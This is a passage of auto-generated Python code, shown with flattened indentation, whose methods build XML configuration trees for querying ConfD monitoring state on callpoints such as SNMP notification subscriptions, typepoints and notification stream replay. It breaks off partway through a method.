def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(snmp_notification_subscription, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id = ET.SubElement(error_formatting_callback, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(error_formatting_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id = ET.SubElement(typepoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(typepoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name = ET.SubElement(notification_stream_replay, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_replay_support(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
replay_support = ET.SubElement(notification_stream_replay, "replay-support")
replay_support.text = kwargs.pop('replay_support')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
